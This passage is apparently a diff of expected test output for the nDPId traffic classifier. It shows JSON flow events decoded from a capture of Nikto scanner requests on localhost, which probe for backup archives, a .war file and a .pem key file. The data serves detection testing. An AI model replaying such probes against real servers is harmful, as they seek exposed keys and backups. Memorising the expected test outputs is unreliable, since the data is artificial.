00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277081,"pkt":"AAAAAAAAAAAAAAAACABFAADDZbZAAEAG1nx\/AAABfwAAAcOaH5Ap5V3Dc4s2n4AYAED+twAAAQEICp1m\/IGdZvyBR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277083,"pkt":"AAAAAAAAAAAAAAAACABFAADDEYFAAEAGKrJ\/AAABfwAAAcOcH5DxxikK7qXr+IAYAED+twAAAQEICp1m\/IOdZvyCR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277084,"pkt":"AAAAAAAAAAAAAAAACABFAADFEhNAAEAGKh5\/AAABfwAAAcOeH5AvZipnVfZObIAYAED+uQAAAQEICp1m\/ISdZvyER0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277086,"pkt":"AAAAAAAAAAAAAAAACABFAADF4EhAAEAGW+h\/AAABfwAAAcOgH5AMu9gyVttcv4AYAED+uQAAAQEICp1m\/IadZvyGR0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277087,"pkt":"AAAAAAAAAAAAAAAACABFAADFByZAAEAGNQt\/AAABfwAAAcOiH5Ca4D9dxFiRCIAYAED+uQAAAQEICp1m\/IedZvyHR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277089,"pkt":"AAAAAAAAAAAAAAAACABFAADFHRdAAEAGHxp\/AAABfwAAAcOkH5BFAiVuc2g7y4AYAED+uQAAAQEICp1m\/ImdZvyJR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277090,"pkt":"AAAAAAAAAAAAAAAACABFAADCB4tAAEAGNKl\/AAABfwAAAcOmH5BcnD\/ywDswlIAYAED+tgAAAQEICp1m\/IqdZvyKR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277091,"pkt":"AAAAAAAAAAAAAAAACABFAADCHJtAAEAGH5l\/AAABfwAAAcOoH5BLfyTh3iqQcIAYAED+tgAAAQEICp1m\/IudZvyLR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 